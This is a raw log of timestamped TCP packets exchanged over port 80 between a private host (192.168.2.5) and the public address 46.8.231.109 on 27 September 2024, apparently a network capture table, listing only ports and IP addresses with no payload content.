Sep 27, 2024 00:15:00.378051996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.378063917 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.378101110 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.378144026 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.378184080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.378196001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.378207922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.378221989 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.378242016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.378263950 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.378277063 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.378289938 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.378310919 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.378340006 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.378875017 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.378885984 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.378897905 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.378925085 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.378953934 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.378959894 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.378972054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.378990889 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.379003048 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.379009008 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.379014969 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.379029989 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.379055977 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.379776001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.379815102 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.379826069 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.379832029 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.379846096 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.379867077 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.379950047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.379962921 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.379972935 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.379985094 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.379995108 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.380009890 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.380023956 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.380045891 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.380067110 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.380729914 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.380744934 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.380757093 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.380789995 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.380810022 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.380824089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.380835056 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.380839109 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.380845070 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.380853891 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.380882025 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.380887985 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.380908966 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.380934000 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.381696939 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.381771088 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.381783009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.381789923 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.381814003 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.381814957 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.381827116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.381830931 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.381839037 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.381846905 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.381855965 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.381856918 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.381872892 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.381880999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.381890059 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.381910086 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.382618904 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.382632971 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.382646084 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.382668018 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.382695913 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.382709980 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.382721901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.382735014 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.382752895 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.382755041 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.382769108 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.382781982 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.382805109 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.382822037 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.383527040 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.383579016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.383585930 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.383596897 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.383634090 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.383753061 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.383764029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.383775949 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.383786917 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.383799076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.383806944 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.383835077 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.383862972 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.384469032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.384480953 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.384491920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.384519100 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.384527922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.384537935 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.384546041 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.384550095 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.384562016 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.384578943 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.384607077 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.384615898 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.384661913 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.385348082 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.385396957 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.425029039 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.425060987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.425074100 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.425131083 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.425180912 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.448676109 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.448689938 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.448704004 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.448734045 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.448761940 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.448772907 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.448782921 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.448793888 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.448816061 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.448867083 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.448894978 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.448944092 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.448988914 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.449218035 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.449229002 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.449263096 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.449749947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.449795961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.449804068 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.449806929 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.449820042 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.449835062 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.449851036 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.450181961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.450195074 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.450242043 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.456645012 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.456665993 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.456676960 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.456720114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.456731081 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.456737041 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.456748962 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.456808090 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.456999063 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.457032919 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.457045078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.457056999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.457060099 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.457072973 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.457082033 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.457093000 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.457103968 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.457139969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.457324982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.457336903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.457349062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.457370996 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.457395077 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.457403898 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.457415104 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.457427025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.457437992 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.457446098 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.457473040 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.457504988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.457518101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.457547903 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.457571030 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.457989931 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.458003044 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.458014011 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.458025932 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.458036900 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.458039999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.458070993 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.458282948 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.458295107 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.458306074 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.458317041 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.458329916 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.458340883 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.458369970 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.464821100 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.464883089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.464893103 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.464895010 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.464915991 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.464936972 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.464941978 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.464952946 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.464965105 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.464979887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.464986086 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.464996099 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.465008020 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.465032101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.465326071 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.465338945 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.465349913 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.465361118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.465372086 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.465373993 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.465394020 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.465425014 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.465574980 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.465585947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.465596914 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.465622902 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.465646982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.465646982 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.465657949 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.465670109 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.465682983 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.465689898 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.465702057 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.465718031 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.465743065 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.466140032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.466151953 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.466172934 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.466182947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.466197968 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.466218948 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.466319084 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.466331005 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.466341972 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.466367006 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.466392040 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.466392994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.466404915 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.466415882 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.466425896 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.466427088 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.466432095 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.466458082 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.466473103 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.466506958 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.466519117 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.466530085 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.466542959 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.466546059 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.466555119 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.466557980 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.466566086 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.466573000 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.466578007 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.466604948 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.466614962 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.467757940 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.467771053 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.467808008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.467818022 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.467818975 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.467830896 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.467842102 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.467843056 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.467855930 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.467874050 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.467892885 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.467906952 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.467920065 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.467931032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.467941999 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.467952013 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.467953920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.467962027 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.467966080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.467978001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.467988968 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.468017101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.468203068 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.468214035 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.468225002 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.468246937 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.468254089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.468265057 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.468267918 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.468276978 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.468288898 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.468295097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.468316078 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.468341112 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.468350887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.468365908 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.468377113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.468385935 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.468391895 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.468420029 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.468451023 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.718560934 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.718589067 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.718611956 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.718622923 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.718633890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.718646049 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.718652010 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.718658924 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.718671083 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.718709946 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.718770027 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.718805075 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.718816996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.718828917 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.718841076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.718851089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.718853951 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.718863010 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.718873978 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.718874931 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.718885899 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.718894958 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.718904018 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.718907118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.718931913 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.718949080 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.719067097 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.719079971 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.719105959 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.719115019 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.719124079 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.719136953 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:00.719146967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:00.719163895 CEST	80	49708	46.8.231.109	192.168.2.5
